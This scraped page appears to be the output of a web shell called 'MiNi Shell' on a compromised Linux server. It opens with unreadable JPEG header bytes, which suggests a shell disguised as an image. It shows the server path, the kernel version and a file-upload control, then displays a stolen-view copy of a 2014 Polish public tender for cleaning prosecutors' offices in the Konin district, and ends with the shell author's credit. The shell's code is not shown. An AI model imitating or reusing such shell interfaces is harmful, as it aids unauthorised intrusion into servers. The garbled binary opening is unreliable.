JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140204/40094-N-2014.html

<p class="kh_header"><b>Konin: Świadczenie usług sprzątania pomieszczeń wewnętrznych i terenów zewnętrznych prokuratur okręgu konińskiego</b><br>
<b>Numer ogłoszenia: 40094 - 2014; data zamieszczenia: 04.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prokuratura Okręgowa w Koninie , ul. Kard. St. Wyszyńskiego 1, 62-510 Konin, woj. wielkopolskie, tel. 063 2437510, faks 063 2437611.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług sprzątania pomieszczeń wewnętrznych i terenów zewnętrznych prokuratur okręgu konińskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa sprzątania pomieszczeń wewnętrznych: 
a.Prokuratury Okręgowej w Koninie, 62-510 Konin, ul. Kard. S. Wyszyńskiego 1 (1089,84 m2),
b.Prokuratury Rejonowej w Koninie, 62-510 Konin, ul. Zakładowa 7 (1443,00 m2),
c.Prokuratury Rejonowej w Turku, 62-700 Turek, ul. Legionów Polskich 10 ( 512,39 m2),
d.Prokuratury Rejonowej w Kole, 62-600 Koło, ul. Sienkiewicza 21/23 (354,41 m2),
e.Prokuratury Rejonowej w Słupcy, 62-400 Słupca, ul. Poznańska 14 (522,93 m2),       
i terenów zewnętrznych:
a.Prokuratury Okręgowej w Koninie, w tym:
- tereny utwardzone - 284,00 m2,
- tereny zielone - 196,00 m2,
b.Prokuratura Rejonowa w Koninie, w tym:
- tereny utwardzone - 300,00 m2,
Prokuratury Rejonowej w Turku
- tereny utwardzone - 300,00 m2,
- tereny zielone - 142,80 m2,
c.Prokuratury Rejonowej w Słupcy    
- tereny utwardzone - 363,69 m2,
- tereny zielone - 175,89 m2

Szczegółowe informacje:
Jednostka Prokuratury Okręgowej w Koninie
Powierzchnia (m2):
	- biurowa 671,62,
	- korytarzy i klatek schodowych 140,71,
	- WC i łazienek 42,62,
	- kuchni 15,26, 
- pomieszczeń ograniczonego dostępu (archiwum, kancelaria tajna, serwerownia, pomieszczenia gospodarcze, magazyny 219,63,
w tym:
	- dywany, wykładziny dywanowe 20,92,
	- okna 191,08,
	- tarket 608,36,
	- terakota 508,13,
	- glazura 151,80,
	- panele podłogowe, deski 63,02,
	- powierzchnia szklana przy drzwiach balustrady,
	- miski ustępowe 10 szt.
	- umywalki 15 szt.
	- pisuary 4 szt.
	- dozowniki do mydła w płynie 10 szt.
	- podajniki na papier toaletowy 10 szt.
	- podajniki na ręczniki składane 6 szt.
	- lustra 14 szt.
Jednostka Prokuratury Rejonowej w Koninie
Powierzchnia (m2):
	- biurowa 692,52,
	- korytarzy i klatek schodowych 361,29,
	- WC i łazienek 55,16,
	- kuchni 36,44,
	- pomieszczeń socjalnych 28,23
	- pomieszczeń ograniczonego dostępu (archiwum, kancelaria tajna, serwerownia) 173,69,
	- pomieszczeń pomocniczych (pomieszczenia gospodarcze, magazyny)96,54,
w tym:
	- okna 526,00,
	- panele 790,30,
	- terakota 440,18,
	- płytka ścienna 300,00,
	- miski ustępowe 13 szt.
	- umywalki 13 szt.
	- dozowniki do mydła w płynie 11 szt.
	- podajniki na papier toaletowy 13 szt.
	- podajniki na ręczniki składane 11 szt.
	- lustra 4 szt.
Jednostka Prokuratury Rejonowej w Kole
Powierzchnia (m2):
	- biurowa 242,60,
	- korytarzy i klatek schodowych 44,92,
	- WC i łazienek 10,20,
	- kuchni 13,24,
	- pomieszczeń ograniczonego dostępu (archiwum, serwerownia, pom. gospodarcze) 43,45
w tym:
	- dywany, wykładziny dywanowe 12,80,
	- okna 61,00,
	- terakota 86,00,
	- glazura 46,70,
	- panele podłogowe, deski 45,60,
	- wykładziny PCV 152,90,
	- lastriko 30,00
	- powierzchnia szklana przy drzwiach 16,00,
	- gemalit 180,00
	- miski ustępowe 2 szt.
	- umywalki 1 szt.
	- dozownik do mydła w płynie 1 szt.
	- podajnik na papier toaletowy 2 szt.
	- podajnik na ręczniki papierowe 1 szt.
	- lustra 2 szt.
Jednostka Prokuratury Rejonowej w Turku
Powierzchnia (m2):
	- biurowa 257,20,
	- korytarzy i klatek schodowych 77,27,
	- WC i łazienek 18,44,
	- kuchni 8,71,
	- sali konferencyjnej 34,61,
	- pomieszczeń ograniczonego dostępu (archiwum, kancelaria tajna, serwerownia) 116,16
w tym:
	- terakota 259,18,
	- okna 64,36,
	- glazura 78,00,
	- parkiet, deski 237,71,
	- powierzchnia szklana przy drzwiach luksfery 2,50, 
- miski ustępowe 6 szt.
- umywalki 5 szt.
- pisuary 2 szt.
- dozowniki do mydła w płynie 5 szt.
- podajniki na papier toaletowy 6 szt.
- podajniki na ręczniki składane 4 szt.
- lustra 3 szt.
Jednostka Prokuratury Rejonowej w Słupcy
Powierzchnia (m2):
	- biurowa 193,60,
	- korytarzy i klatek schodowych 63,16,
	- WC i łazienek 12,20,
	- kuchni 23,90,
	- pomieszczeń ograniczonego dostępu (archiwum, kancelaria tajna, serwerownia, magazyny, pom. techniczne) 230,07
w tym:
	- okna 46,77,
 	- terakota, gres 80,23,
	- glazura 51,14,
	- panele podłogowe, deski 172,74,
	- lastriko 33,78,
	- powierzchnia szklana przy drzwiach, luksfery 37,12,
	- posadzka 57,13,
	- kostka brukowa 10,14,
	- wykładziny PCV 113,67,
	- miski ustępowe 3 szt.
	- umywalki, zlewozmywaki 5 szt.
	- dozowniki do mydła w płynie 3 szt.
	- podajniki na papier toaletowy 3 szt.
	- podajniki na ręczniki składane 3 szt. 
	- kabina 1 szt.
	- lustra 3 szt.

2. W zakres usługi sprzątania pomieszczeń wewnętrznych ww jednostkach wchodzi:
-utrzymywanie czystości we wszystkich pomieszczeniach,
-zamiatanie, zmywanie, pastowanie i froterowanie powierzchni podłóg,
-odkurzanie wykładzin dywanowych, z tworzyw sztucznych, dywanów, chodników i mebli tapicerowanych,
-zapieranie plam na wykładzinach i fotelach tapicerowanych, 
-wycieranie z kurzu wszystkich mebli, parapetów, lamp, kontaktów prądu, wyłączników oświetlenia, gniazd komputerowych, likwidowanie pajęczyn,
-wyrzucenie śmieci z koszy i pojemników do tego przystosowanych oraz ich wykładanie workami foliowymi,  
-mycie zlewozmywaków lub podobnych urządzeń do tego przystosowanych,
-wycieranie drzwi i płytek naściennych i ich gruntowne mycie,
-utrzymywanie w czystości WC - w tym mycie ich całego wyposażenia,
-rozmrażanie i mycie lodówek oraz mycie innych urządzeń AGD.
3.Sprzątanie terenów zewnętrznych obejmuje:
a) Prace porządkowe:
- zamiatanie chodników, schodów i parkingów, (codziennie) 
- mycie schodów (w razie potrzeby), 
- wyrzucanie śmieci z koszy (codziennie),
- zbieranie śmieci oraz niedopałków (codziennie),
- usuwanie plam bądź innych zanieczyszczeń (w razie potrzeby) ,
- zamiatanie liści (w razie potrzeby) ,
- składowanie liści oraz ich wywóz  (w razie potrzeby) ,
- odśnieżanie schodów, chodników, parkingów (w razie potrzeby) ,
- wywóz śniegu (w razie potrzeby) ,
- posypywanie piaskiem śliskich i zmrożonych nawierzchni (w razie potrzeby),
- usuwanie oblodzeń (w razie potrzeby),
b) Prace konserwacyjne terenów zielonych obejmują: 
- grabienie i koszenie trawników,
- urządzanie i pielęgnacja zieleńców, 
- przycinanie i formowanie roślin, 
- nawożenie ziemi,
- sadzenie roślin,
- pielenie klombów i zieleńców, 
- opryskiwanie krzewów i kwiatów.
4. Usługi winny być świadczone w sposób i częstotliwością określoną w załączniku nr 1- harmonogram wykonywania robót do projektu umowy, w dniach roboczych od poniedziałku do piątku, średnio 21 dni w miesiącu, również w trakcie wykonywanych remontów obejmujących: biura, korytarze, toalety, klatki schodowe, pomieszczenia magazynowe, łazienki, hole.
Czas sprzątania uzgodniony zostanie w formie pisemnej z kierownikami jednostek wymienionych w § 3 pkt 1.
5. Usługa sprzątania świadczona będzie przy zastosowaniu profesjonalnych środków czystości oraz profesjonalnego sprzętu.
6. Wykonawca gwarantuje, iż materiały i środki czystości, które będą wykorzystywane do wykonywania powyższych usług są dopuszczone do stosowania zgodnie z przepisami prawa i będą stosowane zgodnie z przeznaczeniem i zaleceniami producenta. Zamawiający w każdej chwili trwania umowy będzie mógł zażądać od Wykonawcy okazania używanych środków chemicznych 
i sprawdzenia posiadanych atestów.
7. Wykonawca jest zobowiązany do pokrycia kosztów wynikających z zakupu środków czyszczących, dezynfekujących, pielęgnacyjnych, zapachowych, worków na śmieci, zawieszek do WC, mydła w płynie, papieru toaletowego (dwuwarstwowy, gramatura min. 30g.m2, białość min. 70%, rola o średnicy 19 cm, średnica tulei 6 cm, szerokość 10 cm, długość do 160 m, ) i ręczników papierowych(składane w Z w kolorze białym o wymiarach 25x23 cm).
Ilość osób korzystających z pomieszczeń sanitarnych:
- Prokuratura Okręgowa w Koninie - 45 osób,
- Prokuratura Rejonowa w Koninie - 27 osób,
- Prokuratura Rejonowa w Kole - 14 osób,
- Prokuratura Rejonowa w Turku - 13 osób,
- Prokuratura Rejonowa w Słupcy - 10 osób.
Średnia ilość petentów w ciągu miesiąca w obiektach prokuratur wynosi:
Prokuratura Okręgowa w Koninie - 100 osób
Prokuratura Rejonowa w Koninie - 200 osób
Prokuratura Rejonowa w Kole - 100 osób
Prokuratura Rejonowa w Turku - 100 osób
Prokuratura Rejonowa w Słupcy -  100 osób
8. Przy pracach związanych z pielęgnacją terenów zielonych Wykonawca zobowiązany będzie do stosowania własnych środków ochrony i pielęgnacji roślin. W przypadku dosadzania roślin Zamawiający zakupuje je we własnym zakresie i na swój koszt.  
9. Przy pracach związanych z myciem okien zewnętrznych w budynkach Prokuratury Okręgowej w Koninie (przy klatce schodowej) i Prokuratury Rejonowej w Słupcy (powierzchnia okien 30m2) należy użyć podnośnika.
10. Wykonawca sam wyznacza osoby odpowiedzialne za wykonywanie usług sprzątania, co udokumentuje przez złożenie wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia w poszczególnych jednostkach. Wykaz osób Wykonawca przekaże Zamawiającemu po podpisaniu umowy.
11. Zmiana pracownika będzie możliwa w następującej sytuacji:
- na żądanie Zamawiającego w przypadku nienależytego wykonywania powierzonych prac,
- na wniosek Wykonawcy, uzasadniony obiektywnymi okolicznościami, po przedstawieniu i zaakceptowaniu przez Zamawiającego kandydatury innej osoby. 
12. Zamawiający dopuszcza możliwość przeprowadzenia wizji lokalnej w w/w obiektach Prokuratur, po uprzednim telefonicznym ustaleniu terminu.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający w celu spełnienia warunku posiadania uprawnień do wykonywania określonej działalności lub czynności żąda wyłącznie oświadczenie o spełnieniu tego warunku udziału w postępowaniu (załącznik nr 1 do Swiz)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał lub nadal wykonuje należycie co najmniej jedną usługę odpowiadającą swoim rodzajem i wartością usłudze będącej przedmiotem zamówienia z podaniem jej wartości, przedmiotu, daty wykonania i podmiotu, na rzecz którego usługa została wykonana. Za spełnienie powyższego warunku Zamawiający uzna usługę rozpoczętą i zakończoną lub rozpoczętą 
i wykonywaną obejmującą co najmniej okres 10 miesięcy. Spełnienie warunku porównywalności, wymaga bezwzględnego spełnienia wymienionych wyżej przesłanek, a także załączenia dowodu potwierdzającego, że usługa ta została wykonana lub jest wykonywana należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający w celu spełnienia warunku dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia żąda wyłącznie oświadczenie o spełnieniu tego warunku udziału w postępowaniu (załącznik nr 1 do Swiz)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający w celu spełnienia warunku dysponowania osobami zdolnymi do wykonania zamówienia żąda wyłącznie oświadczenie o spełnieniu tego warunku udziału w postępowaniu (załącznik nr 1 do Swiz)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający w celu spełnienia warunku znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia żąda wyłącznie oświadczenie o spełnieniu tego warunku udziału w postępowaniu (załącznik 
nr 1 do Swiz)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji Wykonawcy, a jeżeli Wykonawcę reprezentuje pełnomocnik - także pełnomocnictwo, określające zakres umocowania podpisane przez osoby uprawnione do reprezentowania Wykonawcy.
2. W przypadku, gdy ofertę składają Wykonawcy ubiegający się wspólnie o udzielenie zamówienia wymagane jest załączenie dokumentu pełnomocnictwa określającego zakres umocowania pełnomocnika ustanowionego do reprezentowania ich w postępowaniu, stosownie do art.23 ust. 2 ustawy Pzp.
3. W przypadku, gdy Wykonawca, wykazując spełnienie warunku wiedzy i doświadczenia, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, zobowiązany jest załączyć pisemne oświadczenie podmiotu, z którego jednoznacznie będzie wynikało, przez jaki okres i jaki zakres przedmiotu zamówienia będzie realizował, jako podwykonawca.
4. Jeżeli w kraju zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w § 6 ust 7 Siwz, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawione z odpowiednią datą wymaganą dla tych dokumentów</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W szczególności Zamawiający dopuszcza:
a) zmianę wartości wynagrodzenia brutto umowy i kwoty podatku VAT, w przypadku zmiany wysokości stawki podatku VAT (poprzez wprowadzenie nowej stawki VAT na przedmiot objęty umowa),
b) zmianę podwykonawcy, z którego doświadczenia skorzystał Wykonawca dla potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.konin.po.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Prokuratura Okręgowa w Koninie, ul. Kard. Stefana Wyszyńskiego 1, 62-510 Konin, pokój 108.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.02.2014 godzina 10:00, miejsce: Prokuratura Okręgowa w Koninie, ul. Kard. Stefana Wyszyńskiego 1, 62-510 Konin, pokój 108.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com